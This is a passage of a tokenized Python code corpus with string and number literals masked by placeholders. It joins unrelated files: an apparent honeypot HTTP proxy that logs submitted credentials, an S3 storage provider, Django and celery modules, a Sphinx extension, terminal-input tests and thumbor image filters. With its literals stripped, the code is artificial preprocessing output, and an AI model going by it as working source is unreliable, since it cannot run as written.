split ( "<STR_LIT::>" ) <EOL> except : <EOL> pass <EOL> elif atype == "<STR_LIT>" : <EOL> print b64decode ( token ) . split ( "<STR_LIT::>" ) <EOL> exit ( <NUM_LIT:1> ) <EOL> print "<STR_LIT>" <EOL> return <EOL> logdata = { '<STR_LIT>' : username , '<STR_LIT>' : password } <EOL> factory . log ( logdata , transport = self . transport ) <EOL> def process ( self ) : <EOL> self . logAuth ( ) <EOL> factory = AlertProxyRequest . FACTORY <EOL> profile = PROFILES [ factory . skin ] <EOL> content = factory . auth_template . render ( <EOL> url = self . uri , <EOL> date = datetime . datetime . utcnow ( ) . strftime ( "<STR_LIT>" ) , <EOL> clientip = self . transport . getPeer ( ) . host <EOL> ) <EOL> if factory . banner : <EOL> prompt = factory . banner <EOL> else : <EOL> prompt = profile . get ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> if profile . get ( "<STR_LIT>" , False ) : <EOL> self . clientproto = "<STR_LIT>" <EOL> self . setResponseCode ( <NUM_LIT> , profile [ "<STR_LIT>" ] ) <EOL> for ( name , value ) in profile [ "<STR_LIT>" ] : <EOL> self . responseHeaders . addRawHeader ( name , value ) <EOL> self . responseHeaders . addRawHeader ( "<STR_LIT:Content-Type>" , "<STR_LIT>" ) <EOL> self . responseHeaders . addRawHeader ( "<STR_LIT>" , <EOL> '<STR_LIT>' % prompt ) <EOL> self . responseHeaders . addRawHeader ( "<STR_LIT>" , len ( content ) ) <EOL> self . write ( content . encode ( "<STR_LIT:utf-8>" ) ) <EOL> self . finish ( ) <EOL> class AlertProxy ( HTTPChannel ) : <EOL> requestFactory = AlertProxyRequest <EOL> class HTTPProxyFactory ( http . HTTPFactory ) : <EOL> def buildProtocol ( self , addr ) : <EOL> return AlertProxy ( ) <EOL> class HTTPProxy ( CanaryService ) : <EOL> NAME = '<STR_LIT>' <EOL> def __init__ ( self , config = None , logger = None ) : <EOL> CanaryService . __init__ ( self , config = config , logger = logger ) <EOL> self . port = int ( config . getVal ( '<STR_LIT>' , default = <NUM_LIT> ) ) <EOL> self . banner = config . 
getVal ( '<STR_LIT>' , '<STR_LIT>' ) . encode ( '<STR_LIT:utf8>' ) <EOL> self . skin = config . getVal ( '<STR_LIT>' , default = '<STR_LIT>' ) <EOL> self . skindir = os . path . join ( <EOL> HTTPProxy . resource_dir ( ) , '<STR_LIT>' , self . skin ) <EOL> self . logtype = logger . LOG_HTTPPROXY_LOGIN_ATTEMPT <EOL> self . listen_addr = config . getVal ( '<STR_LIT>' , default = '<STR_LIT>' ) <EOL> authfilename = os . path . join ( self . skindir , '<STR_LIT>' ) <EOL> try : <EOL> with open ( authfilename , '<STR_LIT:r>' ) as f : <EOL> self . auth_template = Template ( f . read ( ) ) <EOL> except : <EOL> self . auth_template = Template ( "<STR_LIT>" ) <EOL> def getService ( self ) : <EOL> AlertProxyRequest . FACTORY = self <EOL> f = HTTPProxyFactory ( ) <EOL> return internet . TCPServer ( self . port , f , interface = self . listen_addr ) </s>
<s> """<STR_LIT>""" <EOL> try : <EOL> import boto <EOL> BOTO_INSTALLED = True <EOL> except ImportError : <EOL> BOTO_INSTALLED = False <EOL> try : <EOL> import gevent . monkey <EOL> gevent . monkey . patch_all ( ) <EOL> GEVENT_INSTALLED = True <EOL> except ImportError : <EOL> GEVENT_INSTALLED = False <EOL> import io <EOL> import mimetypes <EOL> import os <EOL> from flask import copy_current_request_context , current_app <EOL> from flask_store . exceptions import NotConfiguredError <EOL> from flask_store . providers import Provider <EOL> from flask_store . providers . temp import TemporaryStore <EOL> from werkzeug . datastructures import FileStorage <EOL> class S3Provider ( Provider ) : <EOL> """<STR_LIT>""" <EOL> REQUIRED_CONFIGURATION = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> @ staticmethod <EOL> def app_defaults ( app ) : <EOL> """<STR_LIT>""" <EOL> app . config . setdefault ( '<STR_LIT>' , '<STR_LIT:/>' ) <EOL> app . config . setdefault ( '<STR_LIT>' , app . config [ '<STR_LIT>' ] ) <EOL> app . config . setdefault ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> if not BOTO_INSTALLED : <EOL> raise ImportError ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> def connect ( self ) : <EOL> """<STR_LIT>""" <EOL> if not hasattr ( self , '<STR_LIT>' ) : <EOL> s3connection = boto . s3 . connect_to_region ( <EOL> current_app . config [ '<STR_LIT>' ] , <EOL> aws_access_key_id = current_app . config [ '<STR_LIT>' ] , <EOL> aws_secret_access_key = current_app . config [ '<STR_LIT>' ] ) <EOL> setattr ( self , '<STR_LIT>' , s3connection ) <EOL> return getattr ( self , '<STR_LIT>' ) <EOL> def bucket ( self , s3connection ) : <EOL> """<STR_LIT>""" <EOL> return s3connection . get_bucket ( <EOL> current_app . config . get ( '<STR_LIT>' ) ) <EOL> def join ( self , * parts ) : <EOL> """<STR_LIT>""" <EOL> return self . url_join ( * parts ) <EOL> def exists ( self , filename ) : <EOL> """<STR_LIT>""" <EOL> s3connection = self . 
connect ( ) <EOL> bucket = self . bucket ( s3connection ) <EOL> path = self . join ( self . store_path , filename ) <EOL> key = boto . s3 . key . Key ( name = path , bucket = bucket ) <EOL> return key . exists ( ) <EOL> def save ( self ) : <EOL> """<STR_LIT>""" <EOL> fp = self . fp <EOL> s3connection = self . connect ( ) <EOL> bucket = self . bucket ( s3connection ) <EOL> filename = self . safe_filename ( self . filename ) <EOL> path = self . join ( self . store_path , filename ) <EOL> mimetype , encoding = mimetypes . guess_type ( filename ) <EOL> fp . seek ( <NUM_LIT:0> ) <EOL> key = bucket . new_key ( path ) <EOL> key . set_metadata ( '<STR_LIT:Content-Type>' , mimetype ) <EOL> key . set_contents_from_file ( fp ) <EOL> key . set_acl ( current_app . config . get ( '<STR_LIT>' ) ) <EOL> self . filename = filename <EOL> def open ( self ) : <EOL> """<STR_LIT>""" <EOL> s3connection = self . connect ( ) <EOL> bucket = self . bucket ( s3connection ) <EOL> key = bucket . get_key ( self . relative_path ) <EOL> if not key : <EOL> raise IOError ( '<STR_LIT>' . format ( self . relative_path ) ) <EOL> return io . BytesIO ( key . read ( ) ) <EOL> class S3GeventProvider ( S3Provider ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> """<STR_LIT:U+0020>""" <EOL> if not GEVENT_INSTALLED : <EOL> raise NotConfiguredError ( <EOL> '<STR_LIT>' ) <EOL> super ( S3GeventProvider , self ) . __init__ ( * args , ** kwargs ) <EOL> def save ( self ) : <EOL> """<STR_LIT>""" <EOL> fp = self . fp <EOL> temp = TemporaryStore ( fp ) <EOL> path = temp . save ( ) <EOL> filename = self . safe_filename ( fp . filename ) <EOL> @ copy_current_request_context <EOL> def _save ( ) : <EOL> self . fp = FileStorage ( <EOL> stream = open ( path , '<STR_LIT:rb>' ) , <EOL> filename = filename , <EOL> name = fp . name , <EOL> content_type = fp . content_type , <EOL> content_length = fp . content_length , <EOL> headers = fp . headers ) <EOL> super ( S3GeventProvider , self ) . 
save ( ) <EOL> os . unlink ( path ) <EOL> gevent . spawn ( _save ) <EOL> self . filename = filename </s>
<s> """<STR_LIT>""" <EOL> from flask_velox . mixins . sqla . delete import ( <EOL> DeleteObjectMixin , <EOL> MultiDeleteObjectMixin ) <EOL> class DeleteObjectView ( DeleteObjectMixin ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class MultiDeleteObjectView ( MultiDeleteObjectMixin ) : <EOL> """<STR_LIT>""" <EOL> pass </s>
<s> """<STR_LIT>""" <EOL> from flask_via . examples . small import views <EOL> from flask . ext . via . routers import default , Include <EOL> routes = [ <EOL> default . Functional ( '<STR_LIT:/>' , views . home ) , <EOL> default . Functional ( '<STR_LIT>' , views . about ) , <EOL> default . Functional ( '<STR_LIT>' , views . contact ) , <EOL> Include ( '<STR_LIT>' , url_prefix = '<STR_LIT>' ) <EOL> ] </s>
<s> from django . views import generic <EOL> from . import settings <EOL> from . helpers import get_url_redirect <EOL> class LoginRedirectView ( generic . RedirectView ) : <EOL> permanent = False <EOL> def get_redirect_url ( self , ** kwargs ) : <EOL> return get_url_redirect ( self . request ) or settings . DEFAULT_REDIRECT_URL </s>
<s> from __future__ import unicode_literals <EOL> from django . core . paginator import Paginator <EOL> from celery . task import task <EOL> from sequere . utils import get_setting <EOL> @ task ( name = '<STR_LIT>' ) <EOL> def dispatch_action ( action_uid , dispatch = True ) : <EOL> from sequere . models import get_followers <EOL> from sequere . contrib . timeline import app <EOL> from . import Timeline <EOL> logger = dispatch_action . get_logger ( ) <EOL> action = app . backend . get_action ( action_uid ) <EOL> paginator = Paginator ( get_followers ( action . actor ) , <EOL> get_setting ( '<STR_LIT>' ) ) <EOL> logger . info ( '<STR_LIT>' % ( action , paginator . count ) ) <EOL> for num_page in paginator . page_range : <EOL> page = paginator . page ( num_page ) <EOL> for obj , timestamp in page . object_list : <EOL> if action . actor == obj : <EOL> continue <EOL> timeline = Timeline ( obj ) <EOL> timeline . save ( action , dispatch = dispatch ) <EOL> def populate_actions ( from_uid , to_uid , method , logger = None ) : <EOL> from sequere import app <EOL> from . import Timeline <EOL> from_instance = app . backend . get_from_uid ( from_uid ) <EOL> to_instance = app . backend . get_from_uid ( to_uid ) <EOL> paginator = Paginator ( Timeline ( from_instance ) . get_public ( ) , <EOL> get_setting ( '<STR_LIT>' ) ) <EOL> timeline = Timeline ( to_instance ) <EOL> if logger : <EOL> logger . info ( '<STR_LIT>' % ( method , <EOL> to_instance , <EOL> paginator . count , <EOL> from_instance ) ) <EOL> for num_page in paginator . page_range : <EOL> page = paginator . page ( num_page ) <EOL> for action in page . object_list : <EOL> getattr ( timeline , method ) ( action , dispatch = False ) <EOL> @ task ( name = '<STR_LIT>' ) <EOL> def import_actions ( from_uid , to_uid ) : <EOL> populate_actions ( from_uid , to_uid , '<STR_LIT>' , <EOL> logger = import_actions . 
get_logger ( ) ) <EOL> @ task ( name = '<STR_LIT>' ) <EOL> def remove_actions ( from_uid , to_uid ) : <EOL> populate_actions ( from_uid , to_uid , '<STR_LIT>' , <EOL> logger = remove_actions . get_logger ( ) ) </s>
<s> __version__ = '<STR_LIT>' <EOL> __version_info__ = ( <NUM_LIT:0> , <NUM_LIT:2> , <NUM_LIT:0> ) <EOL> class SASLError ( Exception ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class SASLProtocolException ( Exception ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class QOP ( object ) : <EOL> AUTH = b'<STR_LIT>' <EOL> AUTH_INT = b'<STR_LIT>' <EOL> AUTH_CONF = b'<STR_LIT>' <EOL> all = ( AUTH , AUTH_INT , AUTH_CONF ) <EOL> bit_map = { <NUM_LIT:1> : AUTH , <NUM_LIT:2> : AUTH_INT , <NUM_LIT:4> : AUTH_CONF } <EOL> name_map = dict ( ( bit , name ) for name , bit in bit_map . items ( ) ) <EOL> @ classmethod <EOL> def names_from_bitmask ( cls , byt ) : <EOL> return set ( name for bit , name in cls . bit_map . items ( ) if bit & byt ) <EOL> @ classmethod <EOL> def flag_from_name ( cls , name ) : <EOL> return cls . name_map [ name ] </s>
<s> """<STR_LIT>""" <EOL> import re <EOL> from os import path <EOL> from docutils import nodes <EOL> from docutils . parsers import rst <EOL> from docutils . parsers . rst . directives import flag <EOL> from sphinx . util . osutil import copyfile <EOL> from sphinx . util . console import bold <EOL> class ansi_literal_block ( nodes . literal_block ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> COLOR_PATTERN = re . compile ( '<STR_LIT>' ) <EOL> CODE_CLASS_MAP = { <EOL> <NUM_LIT:1> : '<STR_LIT>' , <EOL> <NUM_LIT:4> : '<STR_LIT>' , <EOL> <NUM_LIT:30> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT:32> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> } <EOL> class ANSIColorParser ( object ) : <EOL> """<STR_LIT>""" <EOL> def _finalize_pending_nodes ( self ) : <EOL> """<STR_LIT>""" <EOL> self . new_nodes . extend ( self . pending_nodes ) <EOL> self . pending_nodes = [ ] <EOL> def _add_text ( self , text ) : <EOL> """<STR_LIT>""" <EOL> if text : <EOL> if self . pending_nodes : <EOL> self . pending_nodes [ - <NUM_LIT:1> ] . append ( nodes . Text ( text ) ) <EOL> else : <EOL> self . new_nodes . append ( nodes . Text ( text ) ) <EOL> def _colorize_block_contents ( self , block ) : <EOL> raw = block . rawsource <EOL> literal_node = nodes . literal_block ( ) <EOL> literal_node [ '<STR_LIT>' ] . append ( '<STR_LIT>' ) <EOL> block . replace_self ( literal_node ) <EOL> self . pending_nodes = [ ] <EOL> self . new_nodes = [ ] <EOL> last_end = <NUM_LIT:0> <EOL> for match in COLOR_PATTERN . finditer ( raw ) : <EOL> head = raw [ last_end : match . start ( ) ] <EOL> self . 
_add_text ( head ) <EOL> last_end = match . end ( ) <EOL> codes = [ int ( c ) for c in match . group ( <NUM_LIT:1> ) . split ( '<STR_LIT:;>' ) ] <EOL> if codes [ - <NUM_LIT:1> ] == <NUM_LIT:0> : <EOL> self . _finalize_pending_nodes ( ) <EOL> else : <EOL> code_node = nodes . inline ( ) <EOL> self . pending_nodes . append ( code_node ) <EOL> for code in codes : <EOL> code_node [ '<STR_LIT>' ] . append ( <EOL> '<STR_LIT>' % CODE_CLASS_MAP [ code ] ) <EOL> tail = raw [ last_end : ] <EOL> self . _add_text ( tail ) <EOL> self . _finalize_pending_nodes ( ) <EOL> literal_node . extend ( self . new_nodes ) <EOL> def _strip_color_from_block_content ( self , block ) : <EOL> content = COLOR_PATTERN . sub ( '<STR_LIT>' , block . rawsource ) <EOL> literal_node = nodes . literal_block ( content , content ) <EOL> block . replace_self ( literal_node ) <EOL> def __call__ ( self , app , doctree , docname ) : <EOL> """<STR_LIT>""" <EOL> handler = self . _colorize_block_contents <EOL> if app . builder . name != '<STR_LIT:html>' : <EOL> handler = self . _strip_color_from_block_content <EOL> for ansi_block in doctree . traverse ( ansi_literal_block ) : <EOL> handler ( ansi_block ) <EOL> def add_stylesheet ( app ) : <EOL> if app . config . html_ansi_stylesheet : <EOL> app . add_stylesheet ( '<STR_LIT>' ) <EOL> def copy_stylesheet ( app , exception ) : <EOL> if app . builder . name != '<STR_LIT:html>' or exception : <EOL> return <EOL> stylesheet = app . config . html_ansi_stylesheet <EOL> if stylesheet : <EOL> app . info ( bold ( '<STR_LIT>' ) , nonl = True ) <EOL> dest = path . join ( app . builder . outdir , '<STR_LIT>' , '<STR_LIT>' ) <EOL> source = path . abspath ( path . dirname ( __file__ ) ) <EOL> copyfile ( path . join ( source , stylesheet ) , dest ) <EOL> app . info ( '<STR_LIT>' ) <EOL> class ANSIBlockDirective ( rst . 
Directive ) : <EOL> """<STR_LIT>""" <EOL> has_content = True <EOL> option_spec = dict ( string_escape = flag ) <EOL> def run ( self ) : <EOL> text = '<STR_LIT:\n>' . join ( self . content ) <EOL> if '<STR_LIT>' in self . options : <EOL> text = text . decode ( '<STR_LIT>' ) <EOL> return [ ansi_literal_block ( text , text ) ] <EOL> def setup ( app ) : <EOL> app . require_sphinx ( '<STR_LIT:1.0>' ) <EOL> app . add_config_value ( '<STR_LIT>' , None , '<STR_LIT>' ) <EOL> app . add_directive ( '<STR_LIT>' , ANSIBlockDirective ) <EOL> app . connect ( '<STR_LIT>' , add_stylesheet ) <EOL> app . connect ( '<STR_LIT>' , copy_stylesheet ) <EOL> app . connect ( '<STR_LIT>' , ANSIColorParser ( ) ) </s>
<s> import os <EOL> import signal <EOL> import sys <EOL> import threading <EOL> import time <EOL> import unittest <EOL> from mock import Mock <EOL> try : <EOL> from unittest import skip , skipUnless <EOL> except ImportError : <EOL> def skip ( f ) : <EOL> return lambda self : None <EOL> def skipUnless ( condition , reason ) : <EOL> if condition : <EOL> return lambda x : x <EOL> else : <EOL> return lambda x : None <EOL> from curtsies import events <EOL> from curtsies . input import Input <EOL> class CustomEvent ( events . Event ) : <EOL> pass <EOL> class CustomScheduledEvent ( events . ScheduledEvent ) : <EOL> pass <EOL> @ skipUnless ( sys . stdin . isatty ( ) , "<STR_LIT>" ) <EOL> class TestInput ( unittest . TestCase ) : <EOL> def test_create ( self ) : <EOL> Input ( ) <EOL> def test_iter ( self ) : <EOL> inp = Input ( ) <EOL> inp . send = Mock ( ) <EOL> inp . send . return_value = None <EOL> for i , e in zip ( range ( <NUM_LIT:3> ) , inp ) : <EOL> self . assertEqual ( e , None ) <EOL> self . assertEqual ( inp . send . call_count , <NUM_LIT:3> ) <EOL> def test_send ( self ) : <EOL> inp = Input ( ) <EOL> inp . unprocessed_bytes = [ b'<STR_LIT:a>' ] <EOL> self . assertEqual ( inp . send ( '<STR_LIT>' ) , u'<STR_LIT:a>' ) <EOL> def test_send_nonblocking_no_event ( self ) : <EOL> inp = Input ( ) <EOL> inp . unprocessed_bytes = [ ] <EOL> self . assertEqual ( inp . send ( <NUM_LIT:0> ) , None ) <EOL> def test_nonblocking_read ( self ) : <EOL> inp = Input ( ) <EOL> self . assertEqual ( inp . _nonblocking_read ( ) , <NUM_LIT:0> ) <EOL> def test_send_paste ( self ) : <EOL> inp = Input ( ) <EOL> inp . unprocessed_bytes = [ ] <EOL> inp . _wait_for_read_ready_or_timeout = Mock ( ) <EOL> inp . _wait_for_read_ready_or_timeout . return_value = ( True , None ) <EOL> inp . _nonblocking_read = Mock ( ) <EOL> n = inp . paste_threshold + <NUM_LIT:1> <EOL> first_time = [ True ] <EOL> def side_effect ( ) : <EOL> if first_time : <EOL> inp . unprocessed_bytes . 
extend ( [ b'<STR_LIT:a>' ] * n ) <EOL> first_time . pop ( ) <EOL> return n <EOL> else : <EOL> return None <EOL> inp . _nonblocking_read . side_effect = side_effect <EOL> r = inp . send ( <NUM_LIT:0> ) <EOL> self . assertEqual ( type ( r ) , events . PasteEvent ) <EOL> self . assertEqual ( r . events , [ u'<STR_LIT:a>' ] * n ) <EOL> def test_event_trigger ( self ) : <EOL> inp = Input ( ) <EOL> f = inp . event_trigger ( CustomEvent ) <EOL> self . assertEqual ( inp . send ( <NUM_LIT:0> ) , None ) <EOL> f ( ) <EOL> self . assertEqual ( type ( inp . send ( <NUM_LIT:0> ) ) , CustomEvent ) <EOL> self . assertEqual ( inp . send ( <NUM_LIT:0> ) , None ) <EOL> def test_schedule_event_trigger ( self ) : <EOL> inp = Input ( ) <EOL> f = inp . scheduled_event_trigger ( CustomScheduledEvent ) <EOL> self . assertEqual ( inp . send ( <NUM_LIT:0> ) , None ) <EOL> f ( when = time . time ( ) ) <EOL> self . assertEqual ( type ( inp . send ( <NUM_LIT:0> ) ) , CustomScheduledEvent ) <EOL> self . assertEqual ( inp . send ( <NUM_LIT:0> ) , None ) <EOL> f ( when = time . time ( ) + <NUM_LIT> ) <EOL> self . assertEqual ( inp . send ( <NUM_LIT:0> ) , None ) <EOL> time . sleep ( <NUM_LIT> ) <EOL> self . assertEqual ( type ( inp . send ( <NUM_LIT:0> ) ) , CustomScheduledEvent ) <EOL> self . assertEqual ( inp . send ( <NUM_LIT:0> ) , None ) <EOL> def test_schedule_event_trigger_blocking ( self ) : <EOL> inp = Input ( ) <EOL> f = inp . scheduled_event_trigger ( CustomScheduledEvent ) <EOL> f ( when = time . time ( ) + <NUM_LIT> ) <EOL> self . assertEqual ( type ( next ( inp ) ) , CustomScheduledEvent ) <EOL> def test_threadsafe_event_trigger ( self ) : <EOL> inp = Input ( ) <EOL> f = inp . threadsafe_event_trigger ( CustomEvent ) <EOL> def check_event ( ) : <EOL> self . assertEqual ( type ( inp . send ( <NUM_LIT:1> ) ) , CustomEvent ) <EOL> self . assertEqual ( inp . send ( <NUM_LIT:0> ) , None ) <EOL> t = threading . Thread ( target = check_event ) <EOL> t . start ( ) <EOL> f ( ) <EOL> t . 
join ( ) <EOL> def test_interrupting_sigint ( self ) : <EOL> inp = Input ( sigint_event = True ) <EOL> def send_sigint ( ) : <EOL> os . kill ( os . getpid ( ) , signal . SIGINT ) <EOL> with inp : <EOL> t = threading . Thread ( target = send_sigint ) <EOL> t . start ( ) <EOL> self . assertEqual ( type ( inp . send ( <NUM_LIT:1> ) ) , events . SigIntEvent ) <EOL> self . assertEqual ( inp . send ( <NUM_LIT:0> ) , None ) <EOL> t . join ( ) </s>
<s> from __future__ import with_statement <EOL> import os . path <EOL> import setuptools <EOL> MISC_DIR = "<STR_LIT>" <EOL> REQUIREMENT_DIR = "<STR_LIT>" <EOL> with open ( "<STR_LIT>" ) as fp : <EOL> long_description = fp . read ( ) <EOL> with open ( os . path . join ( MISC_DIR , "<STR_LIT>" ) ) as f : <EOL> summary = f . read ( ) <EOL> with open ( os . path . join ( REQUIREMENT_DIR , "<STR_LIT>" ) ) as f : <EOL> install_requires = [ line . strip ( ) for line in f if line . strip ( ) ] <EOL> with open ( os . path . join ( REQUIREMENT_DIR , "<STR_LIT>" ) ) as f : <EOL> tests_require = [ line . strip ( ) for line in f if line . strip ( ) ] <EOL> setuptools . setup ( <EOL> name = "<STR_LIT>" , <EOL> version = "<STR_LIT>" , <EOL> author = "<STR_LIT>" , <EOL> author_email = "<STR_LIT>" , <EOL> url = "<STR_LIT>" , <EOL> description = summary , <EOL> keywords = [ "<STR_LIT>" ] , <EOL> long_description = long_description , <EOL> license = "<STR_LIT>" , <EOL> include_package_data = True , <EOL> packages = setuptools . find_packages ( exclude = [ '<STR_LIT>' ] ) , <EOL> install_requires = install_requires , <EOL> setup_requires = [ "<STR_LIT>" ] , <EOL> tests_require = tests_require , <EOL> classifiers = [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ] , <EOL> ) </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> os . environ . setdefault ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> from django . core . wsgi import get_wsgi_application <EOL> application = get_wsgi_application ( ) </s>
<s> def ical2text ( ical_string ) : <EOL> import vobject <EOL> result = [ ] <EOL> if isinstance ( ical_string , str ) : <EOL> parsedCal = vobject . readOne ( ical_string ) <EOL> else : <EOL> try : <EOL> parsedCal = vobject . readOne ( ical_string ) <EOL> except : <EOL> parsedCal = vobject . readOne ( ical_string . decode ( '<STR_LIT:utf-8>' , '<STR_LIT:ignore>' ) ) <EOL> for event in parsedCal . getChildren ( ) : <EOL> if event . name == '<STR_LIT>' : <EOL> if hasattr ( event , '<STR_LIT>' ) : <EOL> start = event . dtstart . value . strftime ( '<STR_LIT>' ) <EOL> else : <EOL> start = '<STR_LIT>' <EOL> if hasattr ( event , '<STR_LIT>' ) : <EOL> end = event . dtend . value . strftime ( '<STR_LIT>' ) <EOL> else : <EOL> end = start <EOL> if start == end : <EOL> date_str = start <EOL> else : <EOL> date_str = '<STR_LIT>' % ( start , end ) <EOL> result . append ( '<STR_LIT>' % ( date_str , event . summary . value ) ) <EOL> return '<STR_LIT:\n>' . join ( result ) </s>
<s> import logging <EOL> import importlib <EOL> from django . apps import apps <EOL> from django . core . exceptions import MiddlewareNotUsed <EOL> from django . utils . lru_cache import lru_cache <EOL> from django . utils . module_loading import module_has_submodule <EOL> from . import app_settings <EOL> def configure_logging ( level , format , filename ) : <EOL> """<STR_LIT>""" <EOL> logging . root . handlers = [ ] <EOL> handler = logging . StreamHandler ( ) <EOL> if filename : <EOL> handler = logging . handlers . WatchedFileHandler ( filename ) <EOL> handler . setFormatter ( logging . Formatter ( format ) ) <EOL> logging . root . addHandler ( handler ) <EOL> if level is not None : <EOL> logging . root . setLevel ( level ) <EOL> return handler . stream . fileno ( ) <EOL> @ lru_cache ( ) <EOL> def get_path ( path ) : <EOL> module_name , attr = path . rsplit ( '<STR_LIT:.>' , <NUM_LIT:1> ) <EOL> module = importlib . import_module ( module_name ) <EOL> return getattr ( module , attr ) <EOL> @ lru_cache ( ) <EOL> def get_backend ( ) : <EOL> return get_path ( app_settings . BACKEND ) ( ) <EOL> @ lru_cache ( ) <EOL> def get_middleware ( ) : <EOL> middleware = [ ] <EOL> for path in app_settings . MIDDLEWARE : <EOL> try : <EOL> middleware . append ( get_path ( path ) ( ) ) <EOL> except MiddlewareNotUsed : <EOL> pass <EOL> return middleware <EOL> def import_all_submodules ( name ) : <EOL> for app_config in apps . get_app_configs ( ) : <EOL> app_module = app_config . module <EOL> try : <EOL> importlib . import_module ( '<STR_LIT>' % ( app_module . __name__ , name ) ) <EOL> except ImportError : <EOL> if module_has_submodule ( app_module , name ) : <EOL> raise <EOL> try : <EOL> import setproctitle <EOL> original_title = setproctitle . getproctitle ( ) <EOL> def set_process_title ( * titles ) : <EOL> setproctitle . setproctitle ( "<STR_LIT>" % ( <EOL> original_title , <EOL> '<STR_LIT:U+0020>' . 
join ( '<STR_LIT>' % x for x in titles ) , <EOL> ) ) <EOL> except ImportError : <EOL> def set_process_title ( * titles ) : <EOL> pass </s>
<s> from preggy import expect <EOL> from tests . base import FilterTestCase <EOL> class FillFilterTestCase ( FilterTestCase ) : <EOL> def test_fill_filter_with_fixed_color ( self ) : <EOL> def config_context ( context ) : <EOL> context . request . fit_in = True <EOL> context . request . width = <NUM_LIT> <EOL> context . request . height = <NUM_LIT> <EOL> image = self . get_filtered ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> config_context = config_context <EOL> ) <EOL> expected = self . get_fixture ( '<STR_LIT>' ) <EOL> ssim = self . get_ssim ( image , expected ) <EOL> expect ( ssim ) . to_be_greater_than ( <NUM_LIT> ) <EOL> def test_fill_filter_with_average ( self ) : <EOL> def config_context ( context ) : <EOL> context . request . fit_in = True <EOL> context . request . width = <NUM_LIT> <EOL> context . request . height = <NUM_LIT> <EOL> image = self . get_filtered ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> config_context = config_context <EOL> ) <EOL> expected = self . get_fixture ( '<STR_LIT>' ) <EOL> ssim = self . get_ssim ( image , expected ) <EOL> expect ( ssim ) . to_be_greater_than ( <NUM_LIT> ) </s>
<s> import base64 <EOL> import hmac <EOL> import hashlib <EOL> from unittest import TestCase <EOL> from preggy import expect <EOL> from thumbor . url_signers . base64_hmac_sha1 import ( <EOL> UrlSigner <EOL> ) <EOL> class Base64HmacSha1UrlSignerTestCase ( TestCase ) : <EOL> def test_can_create_signer ( self ) : <EOL> signer = UrlSigner ( security_key = "<STR_LIT>" ) <EOL> expect ( signer ) . to_be_instance_of ( UrlSigner ) <EOL> expect ( signer . security_key ) . to_equal ( '<STR_LIT>' ) <EOL> def test_can_sign_url ( self ) : <EOL> signer = UrlSigner ( security_key = "<STR_LIT>" ) <EOL> url = '<STR_LIT>' <EOL> expected = base64 . urlsafe_b64encode ( <EOL> hmac . new ( <EOL> '<STR_LIT>' , unicode ( url ) . encode ( '<STR_LIT:utf-8>' ) , hashlib . sha1 <EOL> ) . digest ( ) <EOL> ) <EOL> actual = signer . signature ( url ) <EOL> expect ( actual ) . to_equal ( expected ) </s>
<s> from thumbor . filters import BaseFilter , filter_method <EOL> from thumbor . ext . filters import _colorize <EOL> class Filter ( BaseFilter ) : <EOL> @ filter_method ( BaseFilter . PositiveNumber , BaseFilter . PositiveNumber , BaseFilter . PositiveNumber , BaseFilter . String ) <EOL> def colorize ( self , red_pct , green_pct , blue_pct , fill ) : <EOL> fill_r , fill_g , fill_b = tuple ( map ( ord , fill . decode ( '<STR_LIT>' ) ) ) <EOL> mode , data = self . engine . image_data_as_rgb ( ) <EOL> imgdata = _colorize . apply ( mode , red_pct , green_pct , blue_pct , fill_r , fill_g , fill_b , data ) <EOL> self . engine . set_image_data ( imgdata ) </s>
<s> from urllib import quote , unquote <EOL> from thumbor . handlers import ContextHandler <EOL> from thumbor . context import RequestParameters <EOL> import tornado . gen as gen <EOL> import tornado . web <EOL> class ImagingHandler ( ContextHandler ) : <EOL> def compute_etag ( self ) : <EOL> if self . context . config . ENABLE_ETAGS : <EOL> return super ( ImagingHandler , self ) . compute_etag ( ) <EOL> else : <EOL> return None <EOL> @ gen . coroutine <EOL> def check_image ( self , kw ) : <EOL> if self . context . config . MAX_ID_LENGTH > <NUM_LIT:0> : <EOL> exists = yield gen . maybe_future ( self . context . modules . storage . exists ( kw [ '<STR_LIT:image>' ] [ : self . context . config . MAX_ID_LENGTH ] ) ) <EOL> if exists : <EOL> kw [ '<STR_LIT:image>' ] = kw [ '<STR_LIT:image>' ] [ : self . context . config . MAX_ID_LENGTH ] <EOL> url = self . request . path <EOL> kw [ '<STR_LIT:image>' ] = quote ( kw [ '<STR_LIT:image>' ] . encode ( 